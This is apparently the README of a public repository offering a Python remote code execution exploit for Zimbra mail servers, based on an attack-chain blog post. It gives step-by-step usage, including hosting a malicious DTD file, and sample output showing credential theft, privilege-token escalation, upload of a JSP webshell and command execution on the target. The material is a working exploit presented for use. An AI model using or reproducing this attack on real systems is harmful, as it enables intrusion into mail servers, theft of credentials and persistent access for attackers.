/Zimbra-RCE-exploit

RCE exploit for attack chain in "A Saga of Code Executions on Zimbra" post

Primary LanguagePython

Zimbra-RCE-exploit

RCE exploit for attack chain in "A Saga of Code Executions on Zimbra" post. Tested with Zimbra 8.6.0, 8.7.11

Usage:

$ git clone https://github.com/nth347/Zimbra-RCE-exploit.git
$ cd Zimbra-RCE-exploit/
$ # Edit "Target configuration" part, host the "malicious_dtd" file on a webserver
$ chmod +x exploit.py
$ ./exploit.py

Example:

$ ./exploit.py                   
[i] Getting Zimbra credentials
[+] Got credentials: zimbra:XXXXXX

[i] Getting low-privilege token
[+] Got low-privilege token: XXXXX

[i] Getting high-privilege token
[+] Got high-privilege token: XXXXX

[i] Uploading webshell
[+] Uploaded webshell. Location https://mail.test.com/downloads/shell.jsp

webshell@target$ id
uid=999(zimbra) gid=999(zimbra) groups=999(zimbra),0(root)
webshell@target$ 

Reference: